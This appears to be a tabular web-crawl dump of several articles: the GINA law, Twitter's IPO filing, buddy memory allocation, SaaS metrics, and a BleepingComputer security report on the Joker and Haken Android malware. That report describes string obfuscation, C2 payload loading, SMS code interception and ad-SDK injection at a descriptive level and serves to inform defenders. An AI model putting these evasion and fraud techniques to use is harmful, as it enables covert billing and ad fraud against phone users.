id (int64, 3–41.8M) | url (string, 1–1.84k) | title (string, 1–9.99k, ⌀) | author (string, 1–10k, ⌀) | markdown (string, 1–4.36M, ⌀) | downloaded (bool, 2 classes) | meta_extracted (bool, 2 classes) | parsed (bool, 2 classes) | description (string, 1–10k, ⌀) | filedate (string, 2 classes) | date (string, 9–19, ⌀) | image (string, 1–10k, ⌀) | pagetype (string, 365 classes) | hostname (string, 4–84, ⌀) | sitename (string, 1–1.6k, ⌀) | tags (string, 0 classes) | categories (string, 0 classes) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1,000,288 | http://singularityhub.com/2009/12/16/gina-makes-genetic-discrimination-illegal-in-us/ | GINA Makes Genetic Discrimination Illegal In US | Steven Wasick | Craig Venter was the first person to ever publish his genome, and while he may have had some worries before exposing his DNA to the world, getting fired was not one of them. Now, the rest of us can relax as well. The Genetic Information Non-Discrimination Act (GINA) has recently been implemented to prevent employers from discriminating based on genetic information. This reform goes a long way towards eliminating this new form of prejudice, but there are gaps and ambiguities in what it protects, and questions about how it will hold up in the future.
First, the basics: GINA passed almost unanimously out of Congress and was signed by President Bush in May of 2008. Regulations preventing health insurance discrimination have been phasing in since May of this year. The law applies to all health policies, except those for long-term care, and also exempts life insurance, despite the fact that genetic discrimination for life insurance has been banned in both the U.K. and Australia.
Employers also have exemptions. The law does not apply to businesses that employ fewer than 15 employees, and employers can still obtain information on family history that they can glean from obituaries, publicly stated information (the “water cooler” exemption), and leave taken under the Family Medical Leave Act.
Eliminating the fear that genetic information will be used to bar health coverage and employment is good news for commercial testing companies like 23andMe, and for researchers trying to recruit subjects for genetic testing. But while GINA will help to treat people of various genotypes fairly, the effects are more complicated. An employer may already know about your family’s history of early heart disease, but now they cannot act on it. No doubt there are also plenty of lawyers giddy about filing lawsuits that turn on where the boundaries of genetic information are. If your father was an alcoholic, is that genetic information, or just behavioral? Somebody is going to pay a lot of legal fees to find out.
As genetic information becomes more widespread, situations where an employer knows information, perhaps even important information, about their employee, and just has to pretend that they don’t, will become more commonplace. Also potentially problematic is how this will affect employers making hiring decisions, not on the basis of saving money on health insurance, but to determine the capabilities of their employees. Should the Secret Service really have to look the other way when hiring someone with a genetic predisposition to schizophrenia? Or how about when the bar to employment is partially for the employee’s benefit, such as a mining company that would not want to hire people predisposed to lung problems? These conflicts will only increase in a world with $100 genome tests and DNA Facebook apps.
Going even further forward, it will be interesting to see if this law holds up as genetic modification becomes more commonplace. After all, once negative aspects of your genome become a choice, will people still want to carry around the dead weight (mind the pun) of non-genetically modified people on their insurance policy? I would certainly rather have the option of joining a cheaper insurance plan that includes others who are willing to undergo testing and modification. Although a similar situation could occur today, with people joining in a plan with others who have particular healthy genomes, from a fairness standpoint, it’s just not the same. Once people can change their genome, it would no longer be discrimination based on an accident of nature, but on a personal choice.
This idea can lead to a “slippery slope” argument questioning where discrimination based on modified versus unmodified genomes would end, and in a way, the fight to protect genetic information is the harbinger of other, more serious battles. All of them relate to seeing others, and ourselves, as bundles of information, along with being human. The fights now, and in the future over GINA will be signposts for how we deal with the conflict between those two views of ourselves.
For more information about GINA, you can read this fact sheet from the National Institutes of Health.
*[image credits: Wiki Commons, NIH]* | true | true | true | Craig Venter was the first person to ever publish his genome, and while he may have had some worries before exposing his DNA to the world, getting fired was not one of them. Now, the rest of us can relax as well. The Genetic Information Non-Discrimination Act (GINA) has recently been implemented to prevent employers […] | 2024-10-12 00:00:00 | 2009-12-16 00:00:00 | article | singularityhub.com | Singularity Hub | null | null |
|
35,228,687 | https://aisstream.io/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,628,196 | https://cloudplatform.googleblog.com/2018/03/Kubernetes-Engine-network-policy-is-now-generally-available.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
6,492,350 | http://www.bbc.co.uk/news/business-24392336 | Twitter wants to raise $1bn in its stock market debut | null | # Twitter wants to raise $1bn in its stock market debut
**Social networking company Twitter has said it plans to raise $1bn (£619m) in its stock market debut in documents filed with US regulators.**
In the filing, revealed on Thursday, the seven-year-old company said that it now has 218 million monthly users and that 500 million tweets are sent a day.
It made a loss of $69m in the first six months of 2013, on revenues of $254m.
It will be the largest Silicon Valley stock offering since Facebook's listing in 2012.
Analysts said that the offering was likely to get a good response.
"Social media is red hot," said Internet analyst Lou Kerner. "Twitter is front and centre benefiting from market enthusiasm for all things social, and remarkably strong metrics."
## Financial details
The filing also revealed Twitter's finances for the first time.
While the company has never made a profit, its revenue has grown from just $28m in 2010 to $317m by the end of 2012.
Around 85% of Twitter's revenue last year came from ad sales; the rest was from licensing its data.
The company takes in a significant portion of its ad revenue from mobile devices, an important metric often tracked by analysts.
As of 2013, over 65% of the company's advertising revenue was generated from mobile devices. More than 75% of Twitter users accessed the site from their mobile phone during that same time period.
Some analysts said that the decision by the firm to raise capital indicated that it was keen on improving the way people enjoy content on its platform and how advertisers connect with its users.
"Users should be happy about this," said Zachary Reiss-Davis, an analyst with Forrester.
"It looks like Twitter is looking at how to enrich the experience and it understands that to build a successful service, they have to create something people like and want to come back to and spend time on."
Peter Esho from Sydney-based Invast Financial Services, added that Twitter's ease to use had seen it increase its user base, making it an attractive option for advertisers.
"I think what Twitter has working in its favour is that it's very easy to use: it doesn't eat up too much bandwidth for the average user in places where broadband penetration is low," he said.
The filing also revealed that two of the company's co-founders, Evan Williams and Jack Dorsey, own significant stakes in Twitter, and could stand to take in significant sums from the company's stock market listing.
Mr Williams owns 12% of shares in the company, while Mr Dorsey owns 4.9%.
Benchmark Capital's Peter Fenton, an early investor in the company, is the second-biggest shareholder, with 6.7% of shares.
## Advantage Nasdaq?
Twitter indicated three weeks earlier that it had filed for a public stock market offering.
However, under a new law passed by Congress in 2012, it did not have to reveal its financial documents because it had revenue of less than $1bn.
But by releasing the documents publicly, it gave an indication that it hopes to complete its stock sale soon.
The company plans to list under the stock symbol TWTR, but it did not reveal which stock exchange, the Nasdaq or New York Stock Exchange, it had chosen.
However, Mr Esho said that the listing was likely to be on the Nasdaq.
"I was to speculate, I think it would have to be Nasdaq," he said. "That really is the exchange that has seen so many tech names come to the market."
Goldman Sachs is the lead bank taking the company public, a coveted position that is often fought for amongst the nation's biggest banks.
The other banks helping with the offering are Morgan Stanley, JP Morgan, BofA Merrill Lynch, Deutsche Bank Securities and CODE Advisors.
| true | true | true | In documents made public for the first time, social networking company Twitter has said it plans to raise $1bn as part of its stock market debut. | 2024-10-12 00:00:00 | 2013-10-03 00:00:00 | article | bbc.com | BBC News | null | null |
|
23,965,289 | https://www.youtube.com/watch?v=nLSm3Haxz0I | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
23,795,458 | https://en.wikipedia.org/wiki/Buddy_memory_allocation | Buddy memory allocation - Wikipedia | null | # Buddy memory allocation
The **buddy memory allocation** technique is a memory allocation algorithm that divides memory into partitions to try to satisfy a memory request as suitably as possible. This system makes use of splitting memory into halves to try to give a best fit. According to Donald Knuth, the buddy system was invented in 1963 by Harry Markowitz, and was first described by Kenneth C. Knowlton (published 1965).[1] The Buddy memory allocation is relatively easy to implement. It supports limited but efficient splitting and coalescing of memory blocks.
## Algorithm
There are various forms of the buddy system; those in which each block is subdivided into two smaller blocks are the simplest and most common variety. Every memory block in this system has an *order*, where the order is an integer ranging from 0 to a specified upper limit. The size of a block of order n is proportional to 2^n, so that the blocks are exactly twice the size of blocks that are one order lower. Power-of-two block sizes make address computation simple, because all buddies are aligned on memory address boundaries that are powers of two. When a larger block is split, it is divided into two smaller blocks, and each smaller block becomes a unique buddy to the other. A split block can only be merged with its unique buddy block, which then reforms the larger block they were split from.
Starting off, the size of the smallest possible block is determined, i.e. the smallest memory block that can be allocated. If no lower limit existed at all (e.g., bit-sized allocations were possible), there would be a lot of memory and computational overhead for the system to keep track of which parts of the memory are allocated and unallocated. However, a rather low limit may be desirable, so that the average memory waste per allocation (concerning allocations that are, in size, not multiples of the smallest block) is minimized. Typically the lower limit would be small enough to minimize the average wasted space per allocation, but large enough to avoid excessive overhead. The smallest block size is then taken as the size of an order-0 block, so that all higher orders are expressed as power-of-two multiples of this size.
The programmer then has to decide on, or to write code to obtain, the highest possible order that can fit in the remaining available memory space. Since the total available memory in a given computer system may not be a power-of-two multiple of the minimum block size, the largest block size may not span the entire memory of the system. For instance, if the system had 2000 K of physical memory and the order-0 block size was 4 K, the upper limit on the order would be 8, since an order-8 block (256 order-0 blocks, 1024 K) is the biggest block that will fit in memory. Consequently, it is impossible to allocate the entire physical memory in a single chunk; the remaining 976 K of memory would have to be allocated in smaller blocks.
### Example
The following is an example of what happens when a program makes requests for memory. Assume that in this system, the smallest possible block is 64 kilobytes in size, and the upper limit for the order is 4, which results in a largest possible allocatable block, 2^4 times 64 K = 1024 K in size. The following shows a possible state of the system after various memory requests.
Step | Memory state (1024 K arena, 16 × 64 K columns, shown left to right; 2^k denotes a free block of order k, letters mark allocated blocks)
---|---
1 | 2^4
2.1 | 2^3, 2^3
2.2 | 2^2, 2^2, 2^3
2.3 | 2^1, 2^1, 2^2, 2^3
2.4 | 2^0, 2^0, 2^1, 2^2, 2^3
2.5 | A: 2^0, 2^0, 2^1, 2^2, 2^3
3 | A: 2^0, 2^0, B: 2^1, 2^2, 2^3
4 | A: 2^0, C: 2^0, B: 2^1, 2^2, 2^3
5.1 | A: 2^0, C: 2^0, B: 2^1, 2^1, 2^1, 2^3
5.2 | A: 2^0, C: 2^0, B: 2^1, D: 2^1, 2^1, 2^3
6 | A: 2^0, C: 2^0, 2^1, D: 2^1, 2^1, 2^3
7.1 | A: 2^0, C: 2^0, 2^1, 2^1, 2^1, 2^3
7.2 | A: 2^0, C: 2^0, 2^1, 2^2, 2^3
8 | 2^0, C: 2^0, 2^1, 2^2, 2^3
9.1 | 2^0, 2^0, 2^1, 2^2, 2^3
9.2 | 2^1, 2^1, 2^2, 2^3
9.3 | 2^2, 2^2, 2^3
9.4 | 2^3, 2^3
9.5 | 2^4
This allocation could have occurred in the following manner
- The initial situation.
- Program A requests memory 34 K, order 0.
- No order 0 blocks are available, so an order 4 block is split, creating two order 3 blocks.
- Still no order 0 blocks available, so the first order 3 block is split, creating two order 2 blocks.
- Still no order 0 blocks available, so the first order 2 block is split, creating two order 1 blocks.
- Still no order 0 blocks available, so the first order 1 block is split, creating two order 0 blocks.
- Now an order 0 block is available, so it is allocated to A.
- Program B requests memory 66 K, order 1. An order 1 block is available, so it is allocated to B.
- Program C requests memory 35 K, order 0. An order 0 block is available, so it is allocated to C.
- Program D requests memory 67 K, order 1.
- No order 1 blocks are available, so an order 2 block is split, creating two order 1 blocks.
- Now an order 1 block is available, so it is allocated to D.
- Program B releases its memory, freeing one order 1 block.
- Program D releases its memory.
- One order 1 block is freed.
- Since the buddy block of the newly freed block is also free, the two are merged into one order 2 block.
- Program A releases its memory, freeing one order 0 block.
- Program C releases its memory.
- One order 0 block is freed.
- Since the buddy block of the newly freed block is also free, the two are merged into one order 1 block.
- Since the buddy block of the newly formed order 1 block is also free, the two are merged into one order 2 block.
- Since the buddy block of the newly formed order 2 block is also free, the two are merged into one order 3 block.
- Since the buddy block of the newly formed order 3 block is also free, the two are merged into one order 4 block.
As you can see, what happens when a memory request is made is as follows:
- If memory is to be allocated
- Look for a memory slot of a suitable size (the minimal 2^k block that is larger than or equal to the requested memory)
- If it is found, it is allocated to the program
- If not, it tries to make a suitable memory slot. The system does so by trying the following:
- Split a free memory slot larger than the requested memory size into half
- If the lower limit is reached, then allocate that amount of memory
- Go back to step 1 (look for a memory slot of a suitable size)
- Repeat this process until a suitable memory slot is found
- If memory is to be freed
- Free the block of memory
- Look at the neighboring block – is it free too?
- If it is, combine the two, and go back to step 2 and repeat this process until either the upper limit is reached (all memory is freed), or until a non-free neighbour block is encountered
## Implementation and efficiency
In comparison to other simpler techniques such as dynamic allocation, the buddy memory system has little external fragmentation, and allows for compaction of memory with little overhead. The buddy method of freeing memory is fast, with the maximal number of compactions required equal to O(highest order) = O(log2(total memory size)). Typically the buddy memory allocation system is implemented with the use of a binary tree to represent used or unused split memory blocks. The address of a block's "buddy" is equal to the bitwise exclusive OR (XOR) of the block's address and the block's size.
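The snippet below is a minimal, hedged illustration in C of the two computations just described — picking an order for a request and locating a block's buddy with the XOR trick. It is not taken from any real allocator; `MIN_ORDER`/`MAX_ORDER` are example values, and `order` here is the log2 of the block size in bytes rather than the article's relative numbering where order 0 is the smallest block.

```c
#include <stddef.h>
#include <stdio.h>

#define MIN_ORDER 6    /* smallest block: 2^6 = 64 bytes (example value) */
#define MAX_ORDER 20   /* largest block: 2^20 = 1 MiB (example value)    */

/* Smallest order whose block size (2^order) can hold `size` bytes. */
static unsigned order_for(size_t size)
{
    unsigned order = MIN_ORDER;
    while (order < MAX_ORDER && ((size_t)1 << order) < size)
        order++;
    return order;
}

/* Offset of the buddy of the block starting at `offset`, of the given order.
 * Every block is aligned on a multiple of its own size, so the buddy is found
 * by flipping the bit corresponding to the block size: offset XOR 2^order.   */
static size_t buddy_of(size_t offset, unsigned order)
{
    return offset ^ ((size_t)1 << order);
}

int main(void)
{
    size_t request = 66 * 1024;            /* the 66 K request discussed below  */
    unsigned order = order_for(request);   /* -> order 17, i.e. a 128 K block   */

    printf("66 K request -> order %u (%zu K block, %zu K wasted)\n",
           order, ((size_t)1 << order) / 1024,
           (((size_t)1 << order) - request) / 1024);

    /* The 128 K block at offset 128 K has its buddy at offset 0, and vice versa. */
    printf("buddy of offset %zu at order %u is %zu\n",
           (size_t)(128 * 1024), order, buddy_of(128 * 1024, order));
    return 0;
}
```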
However, there still exists the problem of internal fragmentation – memory wasted because the memory requested is a little larger than a small block, but a lot smaller than a large block. Because of the way the buddy memory allocation technique works, a program that requests 66 K of memory would be allocated 128 K, which results in a waste of 62 K of memory. This problem can be solved by slab allocation, which may be layered on top of the more coarse buddy allocator to provide more fine-grained allocation.
One version of the buddy allocation algorithm was described in detail by Donald Knuth in volume 1 of *The Art of Computer Programming*.[2] The Linux kernel also uses the buddy system, with further modifications to minimise external fragmentation, along with various other allocators to manage the memory within blocks.[3]
`jemalloc`[4] is a modern memory allocator that employs, among others, the buddy technique.
## See also
## References

**^** Kenneth C. Knowlton. A Fast Storage Allocator. Communications of the ACM 8(10):623–625, Oct 1965. *Also*: Kenneth C. Knowlton. A programmer's description of L6. Communications of the ACM 9(8):616–625, Aug 1966. [See also: Google Books [1], page 85]
**^** Knuth, Donald (1997). *Fundamental Algorithms*. The Art of Computer Programming. Vol. 1 (Second ed.). Reading, Massachusetts: Addison-Wesley. pp. 435–455. ISBN 0-201-89683-4.
**^** Mauerer, Wolfgang (October 2008). *Professional Linux Kernel Architecture*. Wrox Press. ISBN 978-0-470-34343-2.
**^** Evans, Jason (16 April 2006). *A Scalable Concurrent malloc(3) Implementation for FreeBSD* (PDF). pp. 4–5. | true | true | true | null | 2024-10-12 00:00:00 | 2003-11-12 00:00:00 | null | website | wikipedia.org | Wikimedia Foundation, Inc. | null | null |
20,635,699 | https://www.techrepublic.com/article/are-developers-honestly-happy-working-60-hour-weeks-why-its-bad-news-whatever-your-programming-language/ | Developer | TechRepublic | null | #### Developer
Apple
### Apple Unlocks Contactless Payment for App Developers
Developers could create payment apps as alternatives to Apple Pay, or digital ID cards.
Today’s best web design courses will cover the principles of UX, HTML, CSS, and more.
Web development can be a lucrative and challenging career. See our top picks for courses that can introduce you to the field and kick-start your job search.
The benefits of using Java alternatives such as Azul might include cost optimisation, higher performance and vulnerability management.
C++ and Python continue to compete for the top spot, while Delphi/Object Pascal reaches the top ten.
After just one year, Mojo may be in for a rapid rise after its entrance into the TIOBE Index top 50 list of most popular programming languages.
Master web development, data science, and GUI programming with 11 real-world Python courses totaling 61 hours of content for just $39.99.
With 207 hours of comprehensive training, learn to build complex, responsive, and scalable mobile apps that meet the demands of today’s mobile-first world.
Gain essential data science skills at your own pace, from mastering Python fundamentals to exploring machine learning—all from the comfort of your home.
For just $40, unlock 10 courses packed with 53 hours of practical, beginner-friendly coding skills in HTML, CSS, JavaScript, MongoDB, Redux, and more.
This comprehensive guide offers details about Microsoft Windows 11, including new features, system requirements and more.
Whether you're coding your first app or leveling up your skills, this C# bundle has you covered with 60 hours of learning for $39.99.
Master HTML, CSS, JavaScript, and more with 14 in-depth courses and 109 hours of hands-on training—build websites like the pros for just $39.99.
TechRepublic Premium content helps you solve your toughest IT issues and jump-start your career or next project.
Red Hat's decision to end CentOS is forcing most developers and companies to find an alternative OS. In this guide, learn about the top competitors' features.
Automating basic tasks for your business could be as simple as studying Microsoft PowerShell in these concise courses that you get access to for life.
Using this bundle's six courses totaling 44 hours, you can equip yourself with the skills used by major companies in industries like finance and tech.
Gain essential skills in Python, machine learning, and AI with flexible, self-paced courses designed to fit into your schedule—learn from anywhere.
Today’s best software testing courses offer hands-on experience with unit testing, static analysis, automating functional tests and more. | true | true | true | null | 2024-10-12 00:00:00 | 2024-08-15 00:00:00 | null | article | techrepublic.com | TechRepublic | null | null |
40,084,964 | https://digitalpreservation-blog.lib.cam.ac.uk/raw-flux-streams-and-obscure-formats-further-work-around-imaging-5-25-inch-floppy-disks-5a2cf2e5f0d1 | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
19,472,236 | https://www.slideshare.net/DavidSkok/the-saas-business-model-and-metrics | The SaaS business model and metrics | David Skok | A detailed look at why SaaS businesses are so different from traditional software companies, and why traditional ways of looking at their finances fail to understand the business. Provides an alternative set of metrics that show the right way to look at a SaaS business.
For more on the SaaS business model and Metrics, see this blog post:
www.forentrepreneurs.com/saas-metrics-2/
13. “The thing that surprises many investors &
boards of directors about the SaaS model is
that, even with perfect execution, an
acceleration of growth will often be
accompanied by a squeeze on profitability and
cash flow.”
Ron Gill, CFO at Netsuite
14. What’s the impact of faster growth?
[Chart: cumulative cash flow when adding 2 more, 5 more, or 10 more customers per month]
15. What’s the impact of faster growth?
[Same chart, annotated: with 2, 5, or 10 more customers per month, the cash flow trough gets deeper]
16. “As soon as the product starts to see some
significant uptake, investors expect that the
losses / cash drain should narrow, right?
Instead, this is the perfect time to increase
investment in the business, which will
cause losses to deepen again.”
Ron Gill, CFO at Netsuite
37. Revenue from a single cohort
[Chart: revenue ($) over time from one group of customers (cohort) with no upsell/cross-sell, plus upsell revenue from the same cohort — producing negative churn]
38. CRR and DRR
CRR: Customer Retention Rate
DRR: Dollar Retention Rate
Annual Numbers – expressed as a percentage
Look at the year ago cohort
40. Revenue Lost with 2.5% monthly Churn
[Chart: Year 3 — $3m lost to churn vs $7m renewals; Year 6 — $30m lost to churn vs $70m renewals. It becomes harder and harder to replace this with new bookings]
44. Customer Success
• Not just the responsibility of Customer Success department
• Product
• Design
• Quality (response time, bugs and downtime)
• Sales
• Don’t over sell the product
• Don’t sell the product to the wrong customer types
• Marketing
• Marketing to customers, not just prospects
• But good to have single executive who has this as their top priority
47. CHI – Customer Happiness Index
• Find a way to predict the likelihood of churn
• Most common and simple technique: Usage
• More sophisticated:
• Score usage of specific features higher than others
• E.g.
• Commenting on someone else’s posts on Facebook = Low
• Creating your own post = High
48. High Usage does not correlate with High Value
[Chart: usage plotted against business value, with “Optimal” and “Worst” quadrants marked]
49. My Suggestion
• Consider a CHI score based on Business Value achieved,
and find a way to measure automatically in the app
• Example:
• How many new leads did you bring the customer?
• How much did you improve the lead to customer conversion rate?
57. Always ask to see Bookings over Time
Entrepreneurs always happy to show their MRR over time
But this doesn’t tell whether their bookings are growing
[Chart: monthly MRR bookings, Jan–Jun, broken out into New MRR, Net New MRR, Expansion MRR and Churned MRR]
59. How Revenue Builds for a SaaS Salesperson (assuming no ramp up time)
[Two charts of monthly revenue building from successive customer cohorts, Jan–Dec: one with no churn, one with churn of 2.5%]
60. The Cash Flow Gap
[Charts: monthly net profit and MRR vs expenses for a new sales hire — a cash gap while expenses exceed MRR, with roughly 11 months to breakeven (slightly later breakeven point, because gross profit is less than MRR)]
61. The SaaS Cash Flow Trough
[Chart: cumulative net profit for a new sales hire — total amount invested about $110k, 23 months to get back the investment, but a great return on investment]
62. [Diagram: Search for Product/Market Fit → Search for Repeatable & Scalable Sales Model → Scaling the Business; Conserve Cash during the search phases, Invest Aggressively when scaling the business]
63. What happens at the company level when we add 2 new sales hires every month?
[Charts: monthly and cumulative net profit over 24 months — worst loss $190k in month 11, first profitable month: 21, total amount invested $2.6m, 32 months to get back the investment]
64. Comparison: hiring one versus two sales people per month
[Charts: net profit and cumulative net profit over 35 months for 1 vs 2 sales hires a month — the time to breakeven remains the same, the cash flow trough is halved, and (not adequately shown) the acceleration after breakeven is also halved]
67. What happens if we collect a year’s payment in advance?
[Charts: cash flow and cumulative cash flow, monthly payments vs a year in advance — collecting a year in advance eliminates the cash flow trough and means $35m more cash in this scenario]
71. A rough estimate of CAC versus Sales Complexity
Sales model | Rough estimate of Cost of Customer Acquisition (CAC)
---|---
Freemium | $0 – $40
No Touch Self-Service | $30 – $200
Light Touch Inside Sales | $300 – $800
High Touch Inside Sales | $3,000 – $8,000
Field Sales | $25,000 – $75,000
Field Sales with SE’s | $75,000 – $200,000
72. The relationship is roughly exponential — clearly adding Human Touch dramatically increases costs
77. To make it comparable with a traditional software business, eliminate New Customer Sales, as those benefit the future
[Charts: Revenue 100% = CoGS 24% + Sales & Marketing 51% (Expansion & Retention 25% + New Customer Sales 26%) + R&D 15% + G&A 13%, leaving a loss (6%); with New Customer Sales excluded, the same business shows a 20% profit]
78. [Chart: Profit 20%, Expansion & Retention 25%, CoGS 24%, R&D 15%, G&A 13%]
Now look at DRR (Dollar Retention Rate):
• Example DRR = 123% (Zendesk’s number)
• The existing customer base with no additional revenue is growing at 23% annually
• So you have a business growing 23% year-on-year, generating 20% Profit
80. Summary
• Expect to see the P&L / Cash Flow trough
• Use Unit Economics to evaluate the business
• Look for negative churn, (where DRR > 100%)
• Use SaaS metrics, not traditional metrics
81. The 3 Keys to SaaS Success
1 Acquisition
2 Retention
3 Monetization
82. For more information…
• Visit my blog at www.forEntrepreneurs.com
84. The Magic Number
• In general, I don’t like the Magic Number
• Hard to explain and understand
• BUT – a public company may not give:
• LTV:CAC ratio
• Months to recover CAC
• So use Magic Number to calculate something roughly equivalent
• First developed by Josh James, CEO of Omniture
• The key insight - if your Magic Number is:
• Above 0.75 – step on the gas
• Below 0.75 – step back and look at your business
• Below 0.5 – business probably not ready to expand
85. The Formula for Magic Number
• QRR[X] = Quarterly Revenue in the current quarter
• QRR[X-1] = Quarterly Revenue in the prior quarter
• Sales & Marketing Expense [X-1] = Sales & Marketing expense in the prior quarter
Magic Number = ((QRev[X] − QRev[X−1]) × 4) / Sales & Marketing Expense[X−1]

Expressed in a slightly more readable form:

Magic Number = (Increase in Quarterly Recurring Revenue × 4) / Prior Quarter’s Sales & Marketing Expenses
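Not part of the original deck — a small C sketch of the formula above, using the figures from the example calculation on the next slide as a sanity check:

```c
#include <stdio.h>

/* Magic Number = (increase in quarterly recurring revenue * 4)
 *              / prior quarter's sales & marketing expense        */
static double magic_number(double q_rev, double prior_q_rev, double prior_q_sm_expense)
{
    return (q_rev - prior_q_rev) * 4.0 / prior_q_sm_expense;
}

int main(void)
{
    printf("Q2: %.2f\n", magic_number(1200000, 1000000, 800000)); /* -> 1.00 */
    printf("Q3: %.2f\n", magic_number(1500000, 1200000, 900000)); /* -> 1.33 */
    /* Rules of thumb from slide 84: above 0.75 step on the gas; below 0.75
     * step back and look at the business; below 0.5 probably not ready to expand. */
    return 0;
}
```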
86. Example Magic Number calculation
| | Q1 | Q2 | Q3 |
|---|---|---|---|
| Revenue | $1,000,000 | $1,200,000 | $1,500,000 |
| Sales & Marketing Expense | $800,000 | $900,000 | |
| Magic Number | | 1.0 | 1.33 |
| true | true | true | The SaaS business model and metrics - Download as a PDF or view online for free | 2024-10-12 00:00:00 | 2015-05-08 00:00:00 | website | slideshare.net | Slideshare | null | null |
|
3,379,321 | http://dailyjs.com/2011/12/21/node-roundup/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
22,393,045 | https://www.bleepingcomputer.com/news/security/android-malware-joker-still-fools-googles-defense-new-clicker-found/ | Android Malware: Joker Still Fools Google's Defense, New Clicker Found | Ionut Ilascu | Joker malware that subscribes Android users to premium services without consent is giving Google a hard time as new samples constantly bypass scrutiny and end up in Play Store.
The malware is under constant development and new samples found in the official Android repository seem to be created specifically to avoid Google's detection mechanisms.
Also known as Bread, the malware is a spyware and premium dialer that can access notifications, read and send SMS texts. These capabilities are used to invisibly subscribe victims to premium services.
## Joker avoids US and Canada
Researchers at Check Point discovered four new samples in Play Store recently, in apps with a cumulative installation count higher than 130,000. The malware was hidden in camera, wallpaper, SMS, and photo editing software:
- com.app.reyflow.phote
- com.race.mely.wpaper
- com.landscape.camera.plus
- com.vailsmsplus
To conceal malicious functionality in infected apps, a simple XOR encryption with a static key is applied to relevant strings that check for the presence of an initial payload; if non-existent, it is downloaded from a command and control (C2) server.
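As a generic illustration of that kind of obfuscation (the key and the string below are invented for the example and are not taken from a real Joker sample), single-byte XOR with a static key is symmetric, so the same loop both hides a string at build time and recovers it at runtime:

```c
#include <stdio.h>
#include <string.h>

/* XOR with a static key byte is its own inverse: applying it once obfuscates
 * the string, applying it again restores the original.                       */
static void xor_with_static_key(char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

int main(void)
{
    char secret[] = "http://example.com/payload";  /* placeholder, not a real C2 URL */
    unsigned char key = 0x5A;                      /* made-up static key             */
    size_t len = strlen(secret);

    xor_with_static_key(secret, len, key);         /* obfuscate   */
    xor_with_static_key(secret, len, key);         /* deobfuscate */
    printf("%s\n", secret);
    return 0;
}
```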
The malware does not target devices from the U.S. and Canada, as Check Point discovered a function that reads the operator information specifically to filter out these regions.
If conditions are met, Joker contacts its C2 server to load a configuration file containing a URL for another payload that is executed immediately after download.
"With access to the notification listener, and the ability to send SMS, the payload listens for incoming SMS and extract the premium service confirmation code (2FA) and sends it to the “Offer Page”, to subscribe the user to that premium service" - Check Point
The subscription process is invisible to the user as the URLs for the premium services, which are present in the configuration file, are opened in a hidden webview.
Joker's developer frequently adapts the code to remain undetected. Google says that many of the samples observed in the wild appear to be specifically created for distribution via Play Store as they were not seen elsewhere.
Since Google started tracking Joker in early 2017, the company removed about 1,700 infected Play Store apps. This did not deter the malware author, though, who "used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected."
"At different times, we have seen three or more active variants using different approaches or targeting different carriers. [..] At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day" - Google
New Joker samples emerge almost every day in Google's Play Store, says Aviran Hazum, mobile security researcher at Check Point.
Tatyana Shishkova, Android malware analyst at Kaspersky, has been tweeting about apps with Joker code since October, 2019. She listed over 70 compromised apps that made it into Play Store, many having at least 5,000 installations and a few with more than 50,000.
Almost all of them have been removed from the repository. At least three, totaling more than 21,000 installations, are still present, as Shishkova shows with a tweet today:
#Joker Trojans on Google Playhttps://t.co/q2iWCcNd9v Feb 18, 10,000+ installshttps://t.co/TJcfsmz5FP Feb 19, 1,000+ installshttps://t.co/EagH4xZymj Feb 20, 10,000+ installs pic.twitter.com/lDfDcbhKFk
— Tatyana Shishkova (@sh1shk0va) February 21, 2020
The three apps are Sweet Cam, Photo Collage Editor, and Snap Message. They are listed under different developer names and very few reviews averaging a score of three stars.
## New clicker in Play Store
The same Check Point researchers, Ohad Mana, Israel Wernik, and Bogdan Melnykov led by Aviran Hazum, discovered a new clicker malware family in eight apps on Play Store that seemed to be benign. Collectively, they have more than 50,000 installations.
The purpose of a clicker is ad fraud by mimicking user clicks on advertisements. Mobile ad fraud is a constant challenge these days as it can take many forms. For this offense Google announced yesterday that it removed nearly 600 apps from the official Android store and also banned them from its ad monetization platforms, Google AdMob and Google Ad Manager.
Named Haken, the new clicker malware relies on native code and injection into Facebook and AdMob libraries and gets the configuration from a remote server after it gets past Google's verification process.
The malware was present in applications that provide the advertised functionality, such as a compass app. One flag indicating malicious intent is asking for permissions that the compromised app does not need, such as running code when the device boots.
Once it gets the necessary permissions, Haken achieves its goal by loading a native library ('kagu-lib') and registering two workers and a timer.
"One worker communicates with the C&C server to download a new configuration and process it, while the other is triggered by the timer, checks for requirements and injects code into the Ad-related Activity classes of well-known Ad-SDK’s like Google’s AdMob and Facebook" - Check Point
Native code, injecting into legitimate Ad-SDKs (software development kit), and backdooring apps already in the Play Store allowed Haken to keep a low profile and generate revenue from fraudulent ad campaigns.
It is unclear how long the malware survived and the revenue it made but the low installation count suggests a small figure. If still present on their devices, users are advised to remove the following apps:
- Kids Coloring - com.faber.kids.coloring
- Compass - com.haken.compass
- qrcode - com.haken.qrcode
- Fruits Coloring Book - com.vimotech.fruits.coloring.book
- Soccer Coloring Book - com.vimotech.soccer.coloring.book
- Fruit Jump Tower - mobi.game.fruit.jump.tower
- Ball Number Shooter - mobi.game.ball.number.shooter
- Inongdan - com.vimotech.inongdan
Check Point reported to Google the 12 malicious apps found on Play Store and they are no longer available in the repository.
**Update [02/21/2020]**: Article updated with information of new apps containing the Joker trojan that are currently available from the Play Store
## Post a Comment Community Rules
## You need to login in order to post a comment
Not a member yet? Register Now | true | true | true | Joker malware that subscribes Android users to premium services without consent is giving Google a hard time as new samples constantly bypass scrutiny and end up in Play Store. | 2024-10-12 00:00:00 | 2020-02-21 00:00:00 | article | bleepingcomputer.com | BleepingComputer | null | null |
|
29,181,282 | https://ramblings.mcpher.com/integrate-vba-with-github/ | Integrate VBA with Github - Desktop liberation | Brucemcp | #### VBAGit
